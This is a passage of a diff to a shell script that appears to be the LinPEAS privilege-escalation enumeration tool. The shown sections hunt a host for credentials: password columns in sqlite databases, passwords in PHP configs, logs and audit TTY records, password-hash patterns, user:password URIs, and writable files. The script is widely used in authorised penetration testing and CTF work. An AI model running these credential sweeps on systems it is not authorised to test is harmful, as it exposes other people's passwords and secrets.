2>/dev/null || command -v python3 2>/dev/null) + tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + else + tables="" + fi + if [ "$tables" ]; then + printf "%s\n" "$tables" | while read t; do + columns="" + # Search for credentials inside the table using sqlite3 + if [ -z "$SQLITEPYTHON" ]; then + columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") + # Search for credentials inside the table using python + else + columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) + fi + #Check found columns for interesting fields + INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") + if [ "$INTCOLUMN" ]; then + printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" + printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" + (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head + fi + done + echo "" + fi + fi + done +fi +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Downloaded Files" + sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" +fi + +##-- IF) Web files +print_2title "Web files?(output limit)" +ls -alhR /var/www/ 2>/dev/null | head +ls -alhR /srv/www/htdocs/ 2>/dev/null | head +ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head +ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head +echo "" + +##-- IF) All hidden files +print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" +find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 +echo "" + +##-- IF) Readable files in /tmp, /var/tmp, bachups +print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" +filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) +printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done +echo "" + +##-- IF) Interesting writable files by ownership or all +if ! [ "$IAMROOT" ]; then + print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all + obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + printf "%s\n" "$obmowbe" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -qE "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + echo "" +fi + +##-- IF) Interesting writable files by group +if ! [ "$IAMROOT" ]; then + print_2title "Interesting GROUP writable files (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + for g in $(groups); do + printf " Group $GREEN$g:\n$NC"; + iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + printf "%s\n" "$iwfbg" | while read entry; do if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -qE "$writeVB"; then + elif echo "$entry" | grep -Eq "$writeVB"; then echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," else echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," fi done - echo "" - fi - - ##-- IF) Interesting writable files by group - if ! [ "$IAMROOT" ]; then - print_2title "Interesting GROUP writable files (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - for g in $(groups); do - printf " Group $GREEN$g:\n$NC"; - iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$iwfbg" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -Eq "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - done - echo "" - fi - - ##-- IF) Passwords in config PHP files - print_2title "Searching passwords in config PHP files" - printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done + done echo "" - - ##-- IF) TTY passwords - print_2title "Checking for TTY (sudo/su) passwords in audit logs" - aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" - find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" - echo "" - - ##-- IF) IPs inside logs - print_2title "Finding IPs inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 - echo "" - - ##-- IF) Passwords inside logs - print_2title "Finding passwords inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," - echo "" - - ##-- IF) Emails inside logs - print_2title "Finding emails inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" - echo "" - - ##-- IF) Passwords files in home - print_2title "Finding *password* or *credential* files in home (limit 70)" - (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found - echo "" - - if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Find possible files with passwords - print_2title "Finding passwords inside key folders (limit 70) - only PHP files" - intpwdfiles=$(timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$HOMESEARCH" /var/www /usr/local/www/ "$backup_folders_row" /tmp /etc /root /mnt /Users /private 2>/dev/null) - printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - print_2title "Finding passwords inside key folders (limit 70) - no PHP files" - printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - ##-- IF) Find possible files with passwords - print_2title "Finding possible password variables inside key folders (limit 140)" - timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" - timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" - echo "" - - ##-- IF) Find possible conf files with passwords - print_2title "Finding possible password in config files" - ppicf=$(find "$HOMESEARCH" /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) - printf "%s\n" "$ppicf" | while read f; do - if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then - echo "$ITALIC $f$NC" - grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" - fi - done - echo "" - - ##-- IF) Find possible files with usernames - print_2title "Finding 'username' string inside key folders (limit 70)" - timeout 150 grep -RiIE "username.*[=:].+" "$HOMESEARCH" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" - timeout 150 grep -RiIE "username.*[=:].+" /var/www "$backup_folders_row" /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" - echo "" - - ##-- IF) Specific hashes inside files - print_2title "Searching specific hashes inside files - less false positives (limit 70)" - regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*' - regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}' - regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}' - regexwp='\$P\$[a-zA-Z0-9_/\.]{31}' - regexdrupal='\$S\$[a-zA-Z0-9_/\.]{52}' - regexlinuxmd5='\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' - regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' - regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' - regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' - timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED}," - echo "" - fi - - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Specific hashes inside files - print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)" - regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' - regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' - regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' - regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' - timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," - echo "" - fi - - if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then - ##-- IF) Find URIs with user:password@hoststrings - print_2title "Finding URIs with user:password@host inside key folders" - timeout 150 find /var/www "$backup_folders_row" /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" "$HOMESEARCH" 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - echo "" - fi fi + +##-- IF) Passwords in config PHP files +print_2title "Searching passwords in config PHP files" +printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done +echo "" + +##-- IF) TTY passwords +print_2title "Checking for TTY (sudo/su) passwords in audit logs" +aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" +find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" +echo "" + +##-- IF) IPs inside logs +print_2title "Finding IPs inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 +echo "" + +##-- IF) Passwords inside logs +print_2title "Finding passwords inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," +echo "" + +##-- IF) Emails inside logs +print_2title "Finding emails inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" +echo "" + +##-- IF) Passwords files in home +print_2title "Finding *password* or *credential* files in home (limit 70)" +(printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found +echo "" + +if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + ##-- IF) Find possible files with passwords + print_2title "Finding passwords inside key folders (limit 70) - only PHP files" + intpwdfiles=$(timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$HOMESEARCH" /var/www /usr/local/www/ "$backup_folders_row" /tmp /etc /root /mnt /Users /private 2>/dev/null) + printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" + echo "" + + print_2title "Finding passwords inside key folders (limit 70) - no PHP files" + printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" + echo "" + + ##-- IF) Find possible files with passwords + print_2title "Finding possible password variables inside key folders (limit 140)" + timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" + timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" + echo "" + + ##-- IF) Find possible conf files with passwords + print_2title "Finding possible password in config files" + ppicf=$(find "$HOMESEARCH" /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) + printf "%s\n" "$ppicf" | while read f; do + if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then + echo "$ITALIC $f$NC" + grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" + fi + done + echo "" + + ##-- IF) Find possible files with usernames + print_2title "Finding 'username' string inside key folders (limit 70)" + timeout 150 grep -RiIE "username.*[=:].+" "$HOMESEARCH" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" + timeout 150 grep -RiIE "username.*[=:].+" /var/www "$backup_folders_row" /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" + echo "" + + ##-- IF) Specific hashes inside files + print_2title "Searching specific hashes inside files - less false positives (limit 70)" + regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*' + regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}' + regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}' + regexwp='\$P\$[a-zA-Z0-9_/\.]{31}' + regexdrupal='\$S\$[a-zA-Z0-9_/\.]{52}' + regexlinuxmd5='\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' + regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' + regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' + regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' + timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED}," + echo "" +fi + +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + ##-- IF) Specific hashes inside files + print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)" + regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' + regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' + regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' + regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' + timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," + echo "" +fi + +if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then + ##-- IF) Find URIs with user:password@hoststrings + print_2title "Finding URIs with user:password@host inside key folders" + timeout 150 find /var/www "$backup_folders_row" /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" "$HOMESEARCH" 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} 